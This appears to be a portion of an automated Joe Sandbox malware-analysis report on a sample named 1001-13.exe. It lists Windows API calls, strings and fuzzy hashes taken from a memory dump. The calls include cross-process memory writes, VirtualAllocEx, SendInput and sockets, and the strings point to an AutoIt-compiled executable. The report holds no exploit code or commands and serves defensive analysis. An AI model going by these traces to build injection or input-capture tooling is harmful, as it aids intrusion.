                                                      • _free.LIBCMT ref: 00E622D0
                                                      • _free.LIBCMT ref: 00E622E3
                                                      • _free.LIBCMT ref: 00E622F4
                                                      • _free.LIBCMT ref: 00E62305
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 00E495D4
                                                      • StrokeAndFillPath.GDI32(?,?,00E871F7,00000000,?,?,?), ref: 00E495F0
                                                      • SelectObject.GDI32(?,00000000), ref: 00E49603
                                                      • DeleteObject.GDI32 ref: 00E49616
                                                      • StrokePath.GDI32(?), ref: 00E49631
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: 0cb1fc4fcf8c884a7e483299b96ebe07bbb09184f31ff23020da0ea558ca27dd
                                                      • Instruction ID: 4c0aec86679f1ad4ec57c48095ea13e5be7a7a147f334338e9cd621e928b64cd
                                                      • Opcode Fuzzy Hash: 0cb1fc4fcf8c884a7e483299b96ebe07bbb09184f31ff23020da0ea558ca27dd
                                                      • Instruction Fuzzy Hash: 7FF04931006208EFDB229F6AED1CBA53F61BB00326F248264F469750F1C735899AEF20
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: __freea$_free
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3432400110-3206640213
                                                      • Opcode ID: 7536c33a64a6c2f783c111658deba90b5332ee8f323c430034b8508152932e25
                                                      • Instruction ID: 7d7a367efbb76f236e91fb98abe6729fe44f9a4c053731577430b66202a67c9e
                                                      • Opcode Fuzzy Hash: 7536c33a64a6c2f783c111658deba90b5332ee8f323c430034b8508152932e25
                                                      • Instruction Fuzzy Hash: 6ED115319C0245CACB268F68E8557FABBB1EF06384F2D6199E902BB751D3359D80CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: JO
                                                      • API String ID: 0-1663374661
                                                      • Opcode ID: 597d3ace61ac2d558d923426184aadfac71f637403d1e199dde5144e70a20005
                                                      • Instruction ID: 32dd0faa35f4dbaa66717770e0c277c0ee647a6e8b9f10a8e432600c771a16ed
                                                      • Opcode Fuzzy Hash: 597d3ace61ac2d558d923426184aadfac71f637403d1e199dde5144e70a20005
                                                      • Instruction Fuzzy Hash: 6751E376F8060AAFCB109FA4EC45FEEBBB8EF45394F14205AF405B7291D6319901DB61
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00E68B6E
                                                      • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00E68B7A
                                                      • __dosmaperr.LIBCMT ref: 00E68B81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                      • String ID: .
                                                      • API String ID: 2434981716-3963672497
                                                      • Opcode ID: 50f2e132533699e3eedfc2f1c85e9775caded30a6531579d718408dec8372a5d
                                                      • Instruction ID: 79e762f5fd3bbfc317961ef307afa12b0eebac9ab8c170962b43da4ded82c79a
                                                      • Opcode Fuzzy Hash: 50f2e132533699e3eedfc2f1c85e9775caded30a6531579d718408dec8372a5d
                                                      • Instruction Fuzzy Hash: C541BFB4604045AFD7249F64ED84ABD3FE6EF85384F2863AAF894B7552DE31CC029750
                                                      APIs
                                                        • Part of subcall function 00E9B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E921D0,?,?,00000034,00000800,?,00000034), ref: 00E9B42D
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E92760
                                                        • Part of subcall function 00E9B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00E9B3F8
                                                        • Part of subcall function 00E9B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00E9B355
                                                        • Part of subcall function 00E9B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E92194,00000034,?,?,00001004,00000000,00000000), ref: 00E9B365
                                                        • Part of subcall function 00E9B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E92194,00000034,?,?,00001004,00000000,00000000), ref: 00E9B37B
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E927CD
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E9281A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: 0dd3a71b86f494886f95e4bcf14fdf9126a02c1d2681c046c36a99620ecd2dc2
                                                      • Instruction ID: ece77a47ed2271f662d23690aa25836dd56e82b2eb78138005dcaeb962cabf56
                                                      • Opcode Fuzzy Hash: 0dd3a71b86f494886f95e4bcf14fdf9126a02c1d2681c046c36a99620ecd2dc2
                                                      • Instruction Fuzzy Hash: A6411A72900218BFDF10DBA4DD45EEEBBB8AF09700F105099FA55B7181DB716E45CBA1
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1001-13.exe,00000104), ref: 00E61769
                                                      • _free.LIBCMT ref: 00E61834
                                                      • _free.LIBCMT ref: 00E6183E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\1001-13.exe
                                                      • API String ID: 2506810119-678904928
                                                      • Opcode ID: b28233e40e44b4d2a06980f7d0dc4f8c81e210138f0fe99c95486aea5f4ee5b7
                                                      • Instruction ID: 091a6f1c05916c2e98f1b023e7569cfbb0b44fc77573052f07a8e259e2f25e77
                                                      • Opcode Fuzzy Hash: b28233e40e44b4d2a06980f7d0dc4f8c81e210138f0fe99c95486aea5f4ee5b7
                                                      • Instruction Fuzzy Hash: 8431B571A80208AFCB26DF99EC85D9EBBFCFB85390F1851AAF404E7211D6705E40DB90
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E9C306
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00E9C34C
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F01990,011B5240), ref: 00E9C395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem
                                                      • String ID: 0
                                                      • API String ID: 135850232-4108050209
                                                      • Opcode ID: 21f96263765a5459b1c59ec26459d41d979617f56c7faa09a0d5808a063d5a90
                                                      • Instruction ID: 8112032cc9264528ca51c616cf32dce387ad85ae74f64241703a4f800791acfd
                                                      • Opcode Fuzzy Hash: 21f96263765a5459b1c59ec26459d41d979617f56c7faa09a0d5808a063d5a90
                                                      • Instruction Fuzzy Hash: 7941E6712043019FDB20EF25D844F5ABBE4EF85314F209A6DF9A5A72D1D770E904CB52
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00ECCC08,00000000,?,?,?,?), ref: 00EC44AA
                                                      • GetWindowLongW.USER32 ref: 00EC44C7
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC44D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 207d0c2ea67d82d8397da77436ac9b5473b32218c01301d9269da8a1eff18f5d
                                                      • Instruction ID: 39d2b0dce6594c037affa4006e4fa0b81614f6049efb712ec024ff9655e8d4f3
                                                      • Opcode Fuzzy Hash: 207d0c2ea67d82d8397da77436ac9b5473b32218c01301d9269da8a1eff18f5d
                                                      • Instruction Fuzzy Hash: E6318D71210605AFDB258E38DD45FEA7BA9EB08328F206329F979A21D0D772AC529750
                                                      APIs
                                                      • SysReAllocString.OLEAUT32(?,?), ref: 00E96EED
                                                      • VariantCopyInd.OLEAUT32(?,?), ref: 00E96F08
                                                      • VariantClear.OLEAUT32(?), ref: 00E96F12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyString
                                                      • String ID: *j
                                                      • API String ID: 2173805711-1845181700
                                                      • Opcode ID: 2575f4d64734cde73796df4da69eb22a230ce2b677ed86b6646ac83d283dd8ea
                                                      • Instruction ID: db4fb1b134863c3a8bc3e6d7da9093e311cfa49ffc8938e1088f86ec7ab11e64
                                                      • Opcode Fuzzy Hash: 2575f4d64734cde73796df4da69eb22a230ce2b677ed86b6646ac83d283dd8ea
                                                      • Instruction Fuzzy Hash: 4231AF72704205DFCF08AFA4E8559FD3BB6FF85304B1024AAF9036B2A1C734991ADB90
                                                      APIs
                                                        • Part of subcall function 00EB335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00EB3077,?,?), ref: 00EB3378
                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EB307A
                                                      • _wcslen.LIBCMT ref: 00EB309B
                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00EB3106
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 946324512-2422070025
                                                      • Opcode ID: e3aa93fb4170230fb0dd7fd9eb020d3f30bd1510de5a46d550a6264c3d1e4430
                                                      • Instruction ID: cb5a3ad4c2e2373ed45b8bd708a645bc93b9e3b25c8cd5c94aefc2e8204fa25d
                                                      • Opcode Fuzzy Hash: e3aa93fb4170230fb0dd7fd9eb020d3f30bd1510de5a46d550a6264c3d1e4430
                                                      • Instruction Fuzzy Hash: 4D31D53A6042059FC720DF38C586EEB77E4EF54318F249059E915AB392DB72EE45C760
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EC4705
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EC4713
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EC471A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: 50b7c7d6ac5a16a958be91fed56d0833da281e2d422311b32f86af5b3bcd715d
                                                      • Instruction ID: 057308bd2359179e25939ed618ba36403787e0f2e9a07be332431edae0e332ea
                                                      • Opcode Fuzzy Hash: 50b7c7d6ac5a16a958be91fed56d0833da281e2d422311b32f86af5b3bcd715d
                                                      • Instruction Fuzzy Hash: 7D215EF5600208AFEB10DF64DD91DAB37EDEB4A398B141059FA04AB391CB71EC52DA60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 176396367-2734436370
                                                      • Opcode ID: e6c0625305858d1605752865f5c4a6a21f446cd9aac1c191afe24a3bebf94187
                                                      • Instruction ID: 3ff0afe890fbb6d69c94a5562b2bfaf8facda9dfaa69f142e848a295828fca52
                                                      • Opcode Fuzzy Hash: e6c0625305858d1605752865f5c4a6a21f446cd9aac1c191afe24a3bebf94187
                                                      • Instruction Fuzzy Hash: 5E215B7210461166DB31AB2C9D03FBB73E89F91314F10642EFD49B7083EB61AD85C2E6
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EC3840
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EC3850
                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EC3876
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00EA4A08
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EA4A5C
                                                      • SetErrorMode.KERNEL32(00000000,?,?,00ECCC08), ref: 00EA4AD0
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume
                                                      • String ID: %lu
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EC424F
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EC4264
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EC4271
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      APIs
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                        • Part of subcall function 00E92DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00E92DC5
                                                        • Part of subcall function 00E92DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E92DD6
                                                        • Part of subcall function 00E92DA7: GetCurrentThreadId.KERNEL32 ref: 00E92DDD
                                                        • Part of subcall function 00E92DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00E92DE4
                                                      • GetFocus.USER32 ref: 00E92F78
                                                        • Part of subcall function 00E92DEE: GetParent.USER32(00000000), ref: 00E92DF9
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E92FC3
                                                      • EnumChildWindows.USER32(?,00E9303B), ref: 00E92FEB
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                      • String ID: %s%d
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EC58C1
                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EC58EE
                                                      • DrawMenuBar.USER32(?), ref: 00EC58FD
                                                      Similarity
                                                      • API ID: Menu$InfoItem$Draw
                                                      • String ID: 0
                                                      APIs
                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00E8D3BF
                                                      • FreeLibrary.KERNEL32 ref: 00E8D3E5
                                                      Similarity
                                                      • API ID: AddressFreeLibraryProc
                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                      Similarity
                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00ECFC08,?), ref: 00E905F0
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00ECFC08,?), ref: 00E90608
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00ECCC40,000000FF,?,00000000,00000800,00000000,?,00ECFC08,?), ref: 00E9062D
                                                      • _memcmp.LIBVCRUNTIME ref: 00E9064E
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      Similarity
                                                      • API ID: _free
                                                      APIs
                                                      • GetWindowRect.USER32(011BEFC0,?), ref: 00EC62E2
                                                      • ScreenToClient.USER32(?,?), ref: 00EC6315
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00EC6382
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00EB1AFD
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1B0B
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00EB1B8A
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1B94
                                                      Similarity
                                                      • API ID: ErrorLast$socket
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EA5783
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00EA57A9
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EA57CE
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EA57FA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00E582D9,?,00E582D9,?,00000001,?,?,00000001,00E582D9,00E582D9), ref: 00E6D910
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E6D999
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00E6D9AB
                                                      • __freea.LIBCMT ref: 00E6D9B4
                                                        • Part of subcall function 00E63820: RtlAllocateHeap.NTDLL(00000000,?,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6,?,00E31129), ref: 00E63852
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      APIs
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00EC5352
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC5375
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC5382
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EC53A8
                                                      Similarity
                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                      • String ID:
                                                      • API String ID: 3340791633-0
                                                      APIs
                                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00E9ABF1
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E9AC0D
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E9AC74
                                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00E9ACC6
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 00EC769A
                                                      • GetWindowRect.USER32(?,?), ref: 00EC7710
                                                      • PtInRect.USER32(?,?,00EC8B89), ref: 00EC7720
                                                      • MessageBeep.USER32(00000000), ref: 00EC778C
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00EC16EB
                                                        • Part of subcall function 00E93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E93A57
                                                        • Part of subcall function 00E93A3D: GetCurrentThreadId.KERNEL32 ref: 00E93A5E
                                                        • Part of subcall function 00E93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E925B3), ref: 00E93A65
                                                      • GetCaretPos.USER32(?), ref: 00EC16FF
                                                      • ClientToScreen.USER32(00000000,?), ref: 00EC174C
                                                      • GetForegroundWindow.USER32 ref: 00EC1752
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00E9D501
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00E9D50F
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00E9D52F
                                                      • CloseHandle.KERNEL32(00000000), ref: 00E9D5DC
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 420147892-0
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
